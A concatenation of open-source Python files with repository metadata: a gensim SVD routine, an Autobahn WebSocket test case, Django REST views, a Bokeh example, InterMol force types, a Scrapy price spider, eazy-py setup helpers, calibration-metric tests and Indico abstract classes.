chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=dtype) # documents = columns of sparse CSC
m, n = chunk.shape
assert m == num_terms
assert n <= chunksize # the very last chunk of A is allowed to be smaller in size
num_docs += n
logger.debug("multiplying chunk * gauss")
o = np.random.normal(0.0, 1.0, (n, samples)).astype(dtype) # draw a random gaussian matrix
sparsetools.csc_matvecs(m, n, samples, chunk.indptr, chunk.indices, # y = y + chunk * o
chunk.data, o.ravel(), y.ravel())
del chunk, o
y = [y]
q, _ = matutils.qr_destroy(y) # orthonormalize the range
for power_iter in xrange(power_iters):
logger.info("running power iteration #%i", power_iter + 1)
yold = q.copy()
q[:] = 0.0
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
logger.info('PROGRESS: at document #%i/%i', chunk_no * chunksize, num_docs)
chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=dtype) # documents = columns of sparse CSC
tmp = chunk.T * yold
tmp = chunk * tmp
del chunk
q += tmp
del yold
q = [q]
q, _ = matutils.qr_destroy(q) # orthonormalize the range
qt = q[:, :samples].T.copy()
del q
if scipy.sparse.issparse(corpus):
b = qt * corpus
logger.info("2nd phase: running dense svd on %s matrix" % str(b.shape))
u, s, vt = scipy.linalg.svd(b, full_matrices=False)
del b, vt
else:
# second phase: construct the covariance matrix X = B * B.T, where B = Q.T * A
# again, construct X incrementally, in chunks of `chunksize` documents from the streaming
# input corpus A, to avoid using O(number of documents) memory
x = np.zeros(shape=(qt.shape[0], qt.shape[0]), dtype=np.float64)
logger.info("2nd phase: constructing %s covariance matrix", str(x.shape))
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
logger.info('PROGRESS: at document #%i/%i', chunk_no * chunksize, num_docs)
chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=qt.dtype)
b = qt * chunk # dense * sparse matrix multiply
del chunk
x += np.dot(b, b.T) # TODO should call the BLAS routine SYRK, but there is no SYRK wrapper in scipy :(
del b
# now we're ready to compute decomposition of the small matrix X
logger.info("running dense decomposition on %s covariance matrix", str(x.shape))
u, s, vt = scipy.linalg.svd(x) # could use linalg.eigh, but who cares... and svd returns the factors already sorted :)
s = np.sqrt(s) # sqrt to go back from singular values of X to singular values of B = singular values of the corpus
q = qt.T.copy()
del qt
logger.info("computing the final decomposition")
keep = clip_spectrum(s**2, rank, discard=eps)
u = u[:, :keep].copy()
s = s[:keep]
u = np.dot(q, u)
return u.astype(dtype), s.astype(dtype)
| akutuzov/gensim | gensim/models/lsimodel.py | Python | lgpl-2.1 | 34,447 |
###############################################################################
##
## Copyright (c) Crossbar.io Technologies GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case2_7(Case):
DESCRIPTION = """Send unsolicited pong without payload. Verify nothing is received. Clean close with normal code."""
EXPECTATION = """Nothing."""
def onOpen(self):
self.expected[Case.OK] = []
self.expectedClose = {"closedByMe":True,"closeCode":[self.p.CLOSE_STATUS_CODE_NORMAL],"requireClean":True}
self.p.sendFrame(opcode = 10)
self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
self.p.closeAfter(1)
| tavendo/AutobahnTestSuite | autobahntestsuite/autobahntestsuite/case/case2_7.py | Python | apache-2.0 | 1,300 |
from snippets.models import Snippet
from snippets.serializers import SnippetSerializer, UserSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import mixins
from rest_framework import generics
from django.contrib.auth.models import User
from rest_framework import permissions
from snippets.permissions import IsOwnerOrReadOnly
from rest_framework.decorators import api_view
from rest_framework.reverse import reverse
from rest_framework import renderers
from rest_framework import viewsets
from rest_framework.decorators import link
#-- Root API --------------------------------------------------------------------------------------
# Not required when using Routers
#@api_view(('GET',))
#def api_root(request, format=None):
# return Response({
# 'users': reverse('user-list', request=request, format=format),
# 'snippets': reverse('snippet-list', request=request, format=format)
# })
#--------------------------------------------------------------------------------------------------
#-- Users endpoint --------------------------------------------------------------------------------
#### Regular views
#class UserList(generics.ListAPIView):
# queryset = User.objects.all()
# serializer_class = UserSerializer
#
#
#class UserDetail(generics.RetrieveAPIView):
# queryset = User.objects.all()
# serializer_class = UserSerializer
#
#### ViewSets
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""
This viewset automatically provides `list` and `detail` actions.
"""
queryset = User.objects.all()
serializer_class = UserSerializer
#--------------------------------------------------------------------------------------------------
#-- Snippets endpoint -----------------------------------------------------------------------------
#### Base class view
#class SnippetList(APIView):
# """
# List all snippets, or create a new snippet.
# """
# def get(self, request, format=None):
# snippets = Snippet.objects.all()
# serializer = SnippetSerializer(snippets, many=True)
# return Response(serializer.data)
#
# def post(self, request, format=None):
# serializer = SnippetSerializer(data=request.DATA)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
#### Generic base class view w/ mixins
#class SnippetList(mixins.ListModelMixin,
# mixins.CreateModelMixin,
# generics.GenericAPIView):
# # `queryset` and `serializer_class` added by `GenericAPIView`.
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# def get(self, request, *args, **kwargs):
# # `list` method provided by `mixins.ListModelMixin`.
# return self.list(request, *args, **kwargs)
#
# def post(self, request, *args, **kwargs):
# # `create` method provided by `mixins.CreateModelMixin`.
# return self.create(request, *args, **kwargs)
#
#### Generic class view w/ list and create features
#class SnippetList(generics.ListCreateAPIView):
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
#
# def pre_save(self, obj):
# obj.owner = self.request.user
#### Base class view
#class SnippetDetail(APIView):
# """
# Retrieve, update or delete a snippet instance.
# """
# def get_object(self, pk):
# try:
# return Snippet.objects.get(pk=pk)
# except Snippet.DoesNotExist:
# raise Http404
#
# def get(self, request, pk, format=None):
# snippet = self.get_object(pk)
# serializer = SnippetSerializer(snippet)
# return Response(serializer.data)
#
# def put(self, request, pk, format=None):
# snippet = self.get_object(pk)
# serializer = SnippetSerializer(snippet, data=request.DATA)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# def delete(self, request, pk, format=None):
# snippet = self.get_object(pk)
# snippet.delete()
# return Response(status=status.HTTP_204_NO_CONTENT)
#
#### Generic base class view w/ mixins
#class SnippetDetail(mixins.RetrieveModelMixin,
# mixins.UpdateModelMixin,
# mixins.DestroyModelMixin,
# generics.GenericAPIView):
# # `queryset` and `serializer_class` added by `GenericAPIView`.
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# def get(self, request, *args, **kwargs):
# # `retrieve` method provided by `mixins.RetrieveModelMixin`.
# return self.retrieve(request, *args, **kwargs)
#
# def put(self, request, *args, **kwargs):
# # `update` method provided by `mixins.UpdateModelMixin`.
# return self.update(request, *args, **kwargs)
#
# def delete(self, request, *args, **kwargs):
# # `destroy` method provided by mixins.DestroyModelMixin.
# return self.destroy(request, *args, **kwargs)
#
#### Generic class view w/ retrieve, update, destroy features
#class SnippetDetail(generics.RetrieveUpdateDestroyAPIView):
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
#
# def pre_save(self, obj):
# obj.owner = self.request.user
#--------------------------------------------------------------------------------------------------
#-- Snippets Highlights endpoint ---------------------------------------------------------------------------
#class SnippetHighlight(generics.GenericAPIView):
# """
# In this case we want to return a property (`highlighted`) of an object instance (a `Snippet`
# instance), not an object instance itself. So there is no existing concrete generic view that
# we can use, we need to use the base class for representing instances.
# """
# queryset = Snippet.objects.all()
# # We use this specific renderer because we want to return the static HTML code which is stored
# # in the `highlighted` attribute of a `Snippet` instance.
# renderer_classes = (renderers.StaticHTMLRenderer,)
#
# def get(self, request, *args, **kwargs):
# snippet = self.get_object()
# return Response(snippet.highlighted)
#--------------------------------------------------------------------------------------------------
#-- Unique Snippets endpoint w/ ViewSet -----------------------------------------------------------
class SnippetViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides `list`, `create`, `retrieve`,
`update` and `destroy` actions.
Additionally we also provide an extra `highlight` action.
"""
queryset = Snippet.objects.all()
serializer_class = SnippetSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly,
IsOwnerOrReadOnly,)
# Additional `highlight` action
# @link for http GET
# @action for http POST
@link(renderer_classes=[renderers.StaticHTMLRenderer])
def highlight(self, request, *args, **kwargs):
snippet = self.get_object()
return Response(snippet.highlighted)
def pre_save(self, obj):
obj.owner = self.request.user
#--------------------------------------------------------------------------------------------------
| nimiq/test-django-rest | snippets/views.py | Python | apache-2.0 | 7,781 |
## Bokeh server for button click
from bokeh.io import curdoc
from bokeh.layouts import row
from bokeh.models import Button, ColumnDataSource
from bokeh.plotting import figure
x=[3,4,6,12,10,1]
y=[7,1,3,4,1,6]
source = ColumnDataSource(data=dict(x=x, y=y))
plot_figure = figure(height=450, width=600,
tools="save,reset",
x_range=[0,14], y_range=[0,12], toolbar_location="below")
plot_figure.scatter('x', 'y', source=source, size=10)
button = Button(label="Click to set plot title", button_type="success")
def button_click():
plot_figure.title.text = 'Button Clicked'
button.on_event('button_click', button_click)
layout=row(button,plot_figure)
curdoc().add_root(layout)
curdoc().title = "Button Bokeh Server"
| bokeh/bokeh | examples/reference/models/button_server.py | Python | bsd-3-clause | 750 |
import parmed.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_nonbonded_type import AbstractNonbondedType
class LjCNonbondedType(AbstractNonbondedType):
__slots__ = ['C6', 'C12', 'type']
@accepts_compatible_units(None, None,
C6=units.kilojoules_per_mole * units.nanometers ** (6),
C12=units.kilojoules_per_mole * units.nanometers ** (12),
type=None)
def __init__(self, bondingtype1, bondingtype2,
C6=0.0 * units.kilojoules_per_mole * units.nanometers ** (6),
C12=0.0 * units.kilojoules_per_mole * units.nanometers ** (12),
type=False):
AbstractNonbondedType.__init__(self, bondingtype1, bondingtype2, type)
self.C6 = C6
self.C12 = C12
class LjCNonbonded(LjCNonbondedType):
"""
stub documentation
"""
def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
C6=0.0 * units.kilojoules_per_mole * units.nanometers ** (6),
C12=0.0 * units.kilojoules_per_mole * units.nanometers ** (12),
type=False):
self.atom1 = atom1
self.atom2 = atom2
LjCNonbondedType.__init__(self, bondingtype1, bondingtype2,
C6=C6,
C12=C12,
type=type) | shirtsgroup/InterMol | intermol/forces/lj_c_nonbonded_type.py | Python | mit | 1,413 |
import csv
import os
import copy
import re
from decimal import Decimal
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse, FormRequest
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from scrapy.http.cookies import CookieJar
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class AmazonSpider(BaseSpider):
name = 'bosch-german-professional-svh24.de'
allowed_domains = ['svh24.de']
user_agent = 'spd'
def start_requests(self):
with open(os.path.join(HERE, 'bosch_german_professional.csv')) as f:
reader = csv.DictReader(f)
for row in reader:
url = row['svh24']
if url:
yield Request(url, meta={'sku': row['sku']}, callback=self.parse_product)
def parse(self, response):
pass
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
loader = ProductLoader(item=Product(), selector=hxs)
loader.add_value('url', response.url)
loader.add_xpath('name', u'//h1[@itemprop="name"]/text()')
price = hxs.select(u'//span[@itemprop="price"]/text()').extract()[0].replace(',', '.')
loader.add_value('price', price)
loader.add_value('sku', response.meta['sku'])
yield loader.load_item()
| 0--key/lib | portfolio/Python/scrapy/bosch_german_professional/svh24.py | Python | apache-2.0 | 1,479 |
def plus(num):
return num + 1
def mult(num):
return mult * 2
lst = [plus, mult]
print (lst[0](3))
| BogdanShevchenko/PythonGames | deijkstra.py | Python | gpl-2.0 | 109 |
import os
from . import igm
from . import param
from . import templates
from . import filters
from . import photoz
from .version import __version__, __long_version__, __version_hash__
def symlink_eazy_inputs(path='$EAZYCODE', get_hdfn_test_catalog=False, copy=False):
"""
Make symbolic links to EAZY inputs
Parameters
----------
path : str
Full directory path or environment variable pointing to the old eazy
C-code repository that provides the template and filter files.
If `path.startswith('$')` then treat path as an environment variable.
If you install from the repository that provides the eazy-photozy
code as a submodule, then you should be able to run with `path=None`
and retrieve the files directly from the repository. This should
also work with the `pip` installation.
Another safe way to ensure that the necessary files are avialable is
to clone the `eazy-photoz` repository and set an environment variable
to point to it (e.g, 'EAZYCODE'), which you then pass as the `path`
argument.
copy : bool
Copy ``templates`` directory and ``FILTER.RES.latest`` file, rather
than symlink
Returns
-------
Symbolic links to the `FILTER.RES.latest` file and `templates`
directory are created in the current working directory (`./`).
"""
if path.startswith('$'):
path = os.getenv(path)
if path is None:
# Use the code attached to the repository
path = os.path.join(os.path.dirname(__file__), 'data/')
if not os.path.exists(path):
print('Couldn\'t find path {0}'.format(path))
return False
# Templates directory
if os.path.exists('./templates'):
try:
os.remove('./templates')
except PermissionError:
os.system('rm -rf templates')
t_path = os.path.join(path, 'templates')
if copy:
os.system('cp -R {0} .'.format(t_path))
else:
os.symlink(t_path, './templates')
print('{0} -> {1}'.format(t_path, './templates'))
# Filter file
if os.path.exists('./FILTER.RES.latest'):
os.remove('./FILTER.RES.latest')
res_path = os.path.join(path, 'filters/FILTER.RES.latest')
if copy:
os.system(f'cp {0} .'.format(res_path))
else:
os.symlink(res_path, './FILTER.RES.latest')
print('{0} -> {1}'.format(res_path, './FILTER.RES.latest'))
if get_hdfn_test_catalog:
for cat_path in ['inputs', 'hdfn_fs99']:
parent = os.path.join(path, cat_path, 'hdfn_fs99_eazy.cat')
translate = os.path.join(path, cat_path, 'zphot.translate')
if os.path.exists(parent):
for file in [parent, translate]:
os.symlink(file, os.path.basename(file))
print('{0} -> {1}'.format(file, os.path.basename(file)))
def get_test_catalog(path=None, path_is_env=True):
"""
Make symbolic links to EAZY inputs
Parameters
----------
path : str
Full directory path or environment variable pointing to the old eazy
C-code repository that provides the template and filter files.
path_is_env : bool
If True, then `path` is an environment variable pointing to the Eazy
repository. If False, then treat as a directory path.
Returns
-------
Symbolic links in `./`.
"""
if path_is_env:
path = os.getenv(path)
if not os.path.exists(path):
print('Couldn\'t find path {0}'.format(path))
return False
| gbrammer/eazy-py | eazy/__init__.py | Python | mit | 3,736 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for metrics_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from uq_benchmark_2019 import metrics_lib
class MetricsLibTest(tf.test.TestCase, parameterized.TestCase):
def test_bin_predictions_and_accuracies(self):
num_samples = int(1e5)
num_bins = 7
probabilities = np.linspace(0, 1, num_samples)
labels = np.random.random(num_samples) < probabilities
bin_edges, accuracies, counts = metrics_lib.bin_predictions_and_accuracies(
probabilities, labels, num_bins)
bin_centers = metrics_lib.bin_centers_of_mass(probabilities, bin_edges)
self.assertTrue((bin_centers > bin_edges[:-1]).all())
self.assertTrue((bin_centers < bin_edges[1:]).all())
self.assertAllClose(accuracies, bin_centers, atol=0.05)
self.assertAllClose(np.ones(num_bins), num_bins * counts / num_samples,
atol=0.05)
#
# expected_calibration_error
#
def test_expected_calibration_error(self):
np.random.seed(1)
nsamples = 100
probs = np.linspace(0, 1, nsamples)
labels = np.random.rand(nsamples) < probs
ece = metrics_lib.expected_calibration_error(probs, labels)
bad_ece = metrics_lib.expected_calibration_error(probs / 2, labels)
self.assertBetween(ece, 0, 1)
self.assertBetween(bad_ece, 0, 1)
self.assertLess(ece, bad_ece)
bins = metrics_lib.get_quantile_bins(10, probs)
quantile_ece = metrics_lib.expected_calibration_error(probs, labels, bins)
bad_quantile_ece = metrics_lib.expected_calibration_error(
probs / 2, labels, bins)
self.assertBetween(quantile_ece, 0, 1)
self.assertBetween(bad_quantile_ece, 0, 1)
self.assertLess(quantile_ece, bad_quantile_ece)
def test_expected_calibration_error_all_wrong(self):
num_bins = 90
ece = metrics_lib.expected_calibration_error(
np.zeros(10), np.ones(10), bins=num_bins)
self.assertAlmostEqual(ece, 1.)
ece = metrics_lib.expected_calibration_error(
np.ones(10), np.zeros(10), bins=num_bins)
self.assertAlmostEqual(ece, 1.)
def test_expected_calibration_error_all_right(self):
num_bins = 90
ece = metrics_lib.expected_calibration_error(
np.ones(10), np.ones(10), bins=num_bins)
self.assertAlmostEqual(ece, 0.)
ece = metrics_lib.expected_calibration_error(
np.zeros(10), np.zeros(10), bins=num_bins)
self.assertAlmostEqual(ece, 0.)
def test_expected_calibration_error_bad_input(self):
with self.assertRaises(ValueError):
metrics_lib.expected_calibration_error(np.ones(1), np.ones(1))
with self.assertRaises(ValueError):
metrics_lib.expected_calibration_error(np.ones(100), np.ones(1))
with self.assertRaises(ValueError):
metrics_lib.expected_calibration_error(np.ones(100), np.ones(100) * 0.5)
#
# Tests for multiclass functions.
#
def test_get_multiclass_predictions_and_correctness(self):
multiclass_probs = np.array([[0.1, 0.2, 0.7], [0.5, 0.3, 0.2],
[0.7, 0.2, 0.1], [0.3, 0.5, 0.2]])
labels = np.array([2, 0, 1, 0])
(argmax_probs,
is_correct) = metrics_lib.get_multiclass_predictions_and_correctness(
multiclass_probs, labels)
self.assertAllEqual(argmax_probs, [0.7, 0.5, 0.7, 0.5])
self.assertAllEqual(is_correct, [True, True, False, False])
def test_get_multiclass_predictions_and_correctness_error_cases(self):
multiclass_probs = np.array([[0.1, 0.2, 0.7], [0.5, 0.3, 0.2],
[0.7, 0.2, 0.1], [0.3, 0.5, 0.2]])
labels = np.array([2, 0, 1, 0])
with self.assertRaises(ValueError):
bad_multiclass_probs = multiclass_probs - 0.01
metrics_lib.get_multiclass_predictions_and_correctness(
bad_multiclass_probs, labels)
with self.assertRaises(ValueError):
metrics_lib.get_multiclass_predictions_and_correctness(
bad_multiclass_probs[Ellipsis, None], labels)
with self.assertRaises(ValueError):
metrics_lib.get_multiclass_predictions_and_correctness(
bad_multiclass_probs, labels[Ellipsis, None])
def test_expected_calibration_error_multiclass(self):
num_samples = int(1e4)
num_classes = 5
probabilities, labels = _make_perfectly_calibrated_multiclass(
num_samples, num_classes)
good_ece = metrics_lib.expected_calibration_error_multiclass(
probabilities, labels)
bad_ece = metrics_lib.expected_calibration_error_multiclass(
np.fliplr(probabilities), labels)
self.assertAllClose(good_ece, 0, atol=0.05)
self.assertAllClose(bad_ece, 0.5, atol=0.05)
good_ece_topk = metrics_lib.expected_calibration_error_multiclass(
probabilities, labels, top_k=3)
self.assertAllClose(good_ece_topk, 0, atol=0.05)
@parameterized.parameters(1, 2, None)
def test_expected_calibration_error_quantile_multiclass(self, top_k):
bad_quantile_eces = {1: .5, 2: .25, None: .2}
num_samples = int(1e4)
num_classes = 5
probabilities, labels = _make_perfectly_calibrated_multiclass(
num_samples, num_classes)
bins = metrics_lib.get_quantile_bins(10, probabilities, top_k=top_k)
good_quantile_ece = metrics_lib.expected_calibration_error_multiclass(
probabilities, labels, bins, top_k)
bad_quantile_ece = metrics_lib.expected_calibration_error_multiclass(
np.fliplr(probabilities), labels, bins, top_k)
self.assertAllClose(good_quantile_ece, 0, atol=0.05)
self.assertAllClose(bad_quantile_ece, bad_quantile_eces[top_k], atol=0.05)
def test_accuracy_top_k(self):
num_samples = 20
num_classes = 10
probs = np.random.rand(num_samples, num_classes)
probs /= np.expand_dims(probs.sum(axis=1), axis=-1)
probs = np.apply_along_axis(sorted, 1, probs)
labels = np.tile(np.arange(num_classes), 2)
top_2_accuracy = metrics_lib.accuracy_top_k(probs, labels, 2)
top_5_accuracy = metrics_lib.accuracy_top_k(probs, labels, 5)
self.assertEqual(top_2_accuracy, .2)
self.assertEqual(top_5_accuracy, .5)
#
# Tests for Brier score, deomposition
#
def test_brier_scores(self):
batch_shape = (2, 3)
num_samples, num_classes = 99, 9
logits = tf.random.uniform(batch_shape + (num_samples, num_classes))
dist = tfp.distributions.Categorical(logits=logits)
labels = dist.sample().numpy()
probs = dist.probs_parameter().numpy()
scores = metrics_lib.brier_scores(labels, probs=probs)
# Check that computing from logits returns the same result.
self.assertAllClose(scores, metrics_lib.brier_scores(labels, logits=logits))
self.assertEqual(scores.shape, batch_shape + (num_samples,))
def compute_brier(labels_, logits_):
probs_ = tf.math.softmax(logits_, axis=1)
_, nlabels = probs_.shape
plabel = tf.reduce_sum(tf.one_hot(labels_, nlabels) * probs_, axis=1)
brier = tf.reduce_sum(tf.square(probs_), axis=1) - 2.0 * plabel
return tf.reduce_mean(brier)
scores_avg = scores.mean(-1)
for indices in np.ndindex(*batch_shape):
score_i = compute_brier(labels[indices], logits[indices])
self.assertAlmostEqual(score_i.numpy(), scores_avg[indices])
def test_brier_decompositions(self):
batch_shape = (2, 3)
num_samples, num_classes = 99, 9
logits = tf.random.uniform(batch_shape + (num_samples, num_classes))
dist = tfp.distributions.Categorical(logits=logits)
labels = dist.sample().numpy()
probs = dist.probs_parameter().numpy()
all_decomps = metrics_lib.brier_decompositions(labels, probs)
self.assertEqual(all_decomps.shape, batch_shape + (3,))
for indices in np.ndindex(*batch_shape):
decomp_i = metrics_lib.brier_decomposition(labels[indices],
logits[indices])
decomp_i = tf.stack(decomp_i, axis=-1).numpy()
self.assertAllClose(decomp_i, all_decomps[indices])
def _make_perfectly_calibrated_multiclass(num_samples, num_classes):
argmax_probabilities = np.linspace(1/num_classes, 1, num_samples)
# Probs have uniform probability among non-selected class.
probabilities = (1 - argmax_probabilities) / (num_classes - 1)
probabilities = np.tile(probabilities[:, None], [1, num_classes])
probabilities[:, 0] = argmax_probabilities
labels = np.stack([np.random.choice(num_classes, p=p) for p in probabilities])
return probabilities, labels
if __name__ == '__main__':
tf.enable_v2_behavior()
tf.test.main()
| google-research/google-research | uq_benchmark_2019/metrics_lib_test.py | Python | apache-2.0 | 9,261 |
# This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from copy import copy
from pytz import timezone
from indico.util.string import safe_upper, safe_slice
from indico.util.i18n import i18nformat
from persistent import Persistent
from persistent.list import PersistentList
from BTrees.OOBTree import OOBTree, intersection, union
from BTrees.IOBTree import IOBTree
import BTrees.OIBTree as OIBTree
from datetime import datetime
from MaKaC.common.Counter import Counter
from MaKaC.errors import MaKaCError, NoReportError
from MaKaC.trashCan import TrashCanManager
from MaKaC.common.timezoneUtils import nowutc
from MaKaC.i18n import _
from indico.core.config import Config
from MaKaC.common.fossilize import fossilizes, Fossilizable
from MaKaC.fossils.abstracts import IAbstractFieldFossil
from MaKaC.fossils.abstracts import IAbstractTextFieldFossil
from MaKaC.fossils.abstracts import IAbstractSelectionFieldFossil
from MaKaC.fossils.abstracts import ISelectionFieldOptionFossil
from indico.util.i18n import N_
from indico.util.text import wordsCounter
import tempfile
class _AbstractParticipationIndex(Persistent):
"""This class allows to index abstract participations (submitters)
for a single CFA process; this means that clients will be able to
efficiently perform queries of the type "give me all the abstracts
in which a certain registered user is implied".
For being able to perform this indexing, it is supposed that the Avatar
identifier is unique among other avatars and that it cannot change.
This index must be maintained by clients (i.e. the CFAMgr) as it doesn't
keep track of the changes on Participantons.
The key of the index is the Avatar and the values the different
Participations that user has within the current CFA process. For
performance reasons, the Avatar id will be used as index key (using the
whole Avatar object would make the index bigger and as the Avatar id
cannot change it's enough); the clients would have to keep the
integrity of the index.
"""
def __init__(self):
self._idx = OOBTree()
def index(self, participation):
"""Add a new participation to the index
"""
#if the Participation is not linked to an Avatar there's no point to
# index it
a = participation.getAvatar()
if not a:
return
#ToDo: if the Participation corresponds to an abstract which doesn't
# correspond to the current CFAMgr, then an error must be raised
if not self._idx.has_key(a.getId()):
self._idx[a.getId()] = PersistentList()
#if the participation is already in the index, no need for adding it
if participation in self._idx[a.getId()]:
return
self._idx[a.getId()].append(participation)
def unindex(self, participation):
"""Remove an existing participation from the index
"""
#if the Participation is not linked to an Avatar there's no point to
# unindex it
a = participation.getAvatar()
if not a:
return
#if the Avatar associated to the participation isn't in the index do
# nothing
if not self._idx.has_key(a.getId()):
return
#if the given participation is indexed remove it, otherwise do nothing
if participation in self._idx[a.getId()]:
self._idx[a.getId()].remove(participation)
def getParticipationList(self, av):
try:
return self._idx[av.getId()]
except KeyError, e:
return []
class AbstractParticipation(Persistent):
def __init__(self, abstract, **data):
self._abstract = abstract
self._firstName = ""
self._surName = ""
self._email = ""
self._affilliation = ""
self._address = ""
self._telephone = ""
self._fax = ""
self._title = ""
self.setData(**data)
def setFromAvatar(self, av):
data = {"title": av.getTitle(),
"firstName": av.getName(),
"surName": av.getSurName(),
"email": av.getEmail(),
"affiliation": av.getOrganisation(),
"address": av.getAddress(),
"telephone": av.getTelephone(),
"fax": av.getFax()}
self.setData(**data)
def setFromAbstractParticipation(self, part):
data = {"title": part.getTitle(),
"firstName": part.getFirstName(),
"surName": part.getSurName(),
"email": part.getEmail(),
"affiliation": part.getAffiliation(),
"address": part.getAddress(),
"telephone": part.getTelephone(),
"fax": part.getFax()}
self.setData(**data)
def setData(self, **data):
if "firstName" in data:
self.setFirstName(data["firstName"])
if "surName" in data:
self.setSurName(data["surName"])
if "email" in data:
self.setEmail(data["email"])
if "affiliation" in data:
self.setAffiliation(data["affiliation"])
if "address" in data:
self.setAddress(data["address"])
if "telephone" in data:
self.setTelephone(data["telephone"])
if "fax" in data:
self.setFax(data["fax"])
if "title" in data:
self.setTitle(data["title"])
setValues = setData
def getData(self):
data = {}
data["firstName"] = self.getFirstName()
data["surName"] = self.getSurName()
data["email"] = self.getEmail()
data["affiliation"] = self.getAffiliation()
data["address"] = self.getAddress()
data["telephone"] = self.getTelephone()
data["fax"] = self.getFax()
data["title"] = self.getTitle()
return data
getValues = getData
def clone(self, abstract):
ap = AbstractParticipation(abstract, self.getData())
return ap
def _notifyModification(self):
self._abstract._notifyModification()
def _unindex(self):
abs = self.getAbstract()
if abs is not None:
mgr = abs.getOwner()
if mgr is not None:
mgr.unindexAuthor(self)
def _index(self):
abs = self.getAbstract()
if abs is not None:
mgr = abs.getOwner()
if mgr is not None:
mgr.indexAuthor(self)
def setFirstName(self, name):
tmp = name.strip()
if tmp == self.getFirstName():
return
self._unindex()
self._firstName = tmp
self._index()
self._notifyModification()
def getFirstName(self):
return self._firstName
def getName(self):
return self._firstName
def setSurName(self, name):
tmp = name.strip()
if tmp == self.getSurName():
return
self._unindex()
self._surName = tmp
self._index()
self._notifyModification()
def getSurName(self):
return self._surName
def getFamilyName(self):
return self._surName
def setEmail(self, email):
email = email.strip().lower()
if email != self.getEmail():
self._unindex()
self._email = email
self._index()
self._notifyModification()
def getEmail(self):
return self._email
def setAffiliation(self, af):
self._affilliation = af.strip()
self._notifyModification()
setAffilliation = setAffiliation
def getAffiliation(self):
return self._affilliation
def setAddress(self, address):
self._address = address.strip()
self._notifyModification()
def getAddress(self):
return self._address
def setTelephone(self, telf):
self._telephone = telf.strip()
self._notifyModification()
def getTelephone(self):
return self._telephone
def setFax(self, fax):
self._fax = fax.strip()
self._notifyModification()
def getFax(self):
return self._fax
def setTitle(self, title):
self._title = title.strip()
self._notifyModification()
def getTitle(self):
return self._title
def getFullName(self):
res = safe_upper(self.getSurName())
tmp = []
for name in self.getFirstName().lower().split(" "):
if not name.strip():
continue
name = name.strip()
tmp.append(safe_upper(safe_slice(name, 0, 1)) + safe_slice(name, 1))
firstName = " ".join(tmp)
if firstName:
res = "%s, %s" % (res, firstName)
if self.getTitle():
res = "%s %s" % (self.getTitle(), res)
return res
def getStraightFullName(self):
name = ""
if self.getName():
name = "%s " % self.getName()
return "%s%s" % (name, self.getSurName())
def getAbrName(self):
res = self.getSurName()
if self.getFirstName():
if res:
res = "%s, " % res
res = "%s%s." % (res, safe_upper(safe_slice(self.getFirstName(), 0, 1)))
return res
def getAbstract(self):
return self._abstract
def setAbstract(self, abs):
self._abstract = abs
def delete(self):
self._unindex()
self._abstract = None
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
class Author(AbstractParticipation):
def __init__(self, abstract, **data):
AbstractParticipation.__init__(self, abstract, **data)
self._abstractId = ""
def getId(self):
return self._id
def setId(self, newId):
self._id = str(newId)
def clone(self, abstract):
auth = Author(abstract, self.getData())
return auth
def isSpeaker(self):
return self._abstract.isSpeaker(self)
